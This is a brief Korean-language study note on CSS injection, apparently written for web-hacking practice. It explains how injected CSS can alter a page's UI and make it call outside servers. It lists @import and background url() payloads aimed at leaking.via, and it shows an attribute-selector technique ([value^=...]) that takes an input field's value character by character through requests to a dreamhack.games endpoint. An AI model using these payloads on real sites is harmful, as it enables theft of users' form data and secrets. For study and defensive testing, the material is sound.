CSS Injection

CSS(Cascading Style Sheet)

HTML로 정의된 문서를 사용자에게 어떻게 보일지 정의

 

CSS Injection

임의의 CSS 코드를 주입시켜 의도하지 않은 속성이 정의되고, 악의적인 동작을 이끔

 

- 임의 영역의 UI 변경 가능

- IP Ping Back : 외부 서버로 요청하고, 외부 리소스를 불러옴

@import 'https://leaking.via/css-import-string'; 
@import url(https://leaking.via/css-import-url);
background: url(https://leaking.via/css-background);
background-image: \000075\000072\00006C(https://leaking.via/css-escape-url-2);

 

입력 내용 탈취

Attribute Selector 이용해 입력박스 값 탈취 가능

[attr] : attr 이름의 특성을 가진 요소 선택

[attr = value] : attr 이름의 특성값이 value인 요소

[attr ^= value] : attr 이름의 특성값을 가지고 있으며, 접두사로 value가 포함되어 있으면 선택

[attr $= value] : attr 이름의 특성값을 가지고 있으며, 접미사로 value가 포함되어 있으면 선택

 

ex) [attr ^= value] 이용한 탈취

[attr ^= value] 구문을 이용해 첫 한글자를 먼저 탈취한 후, 탈취한 글자를 접두사로 하여 그 다음 한 글자를 탈취

위 과정을 반복

yellow; } input[value^={탈취할문자}] { background: url("https://.request.dreamhack.games/");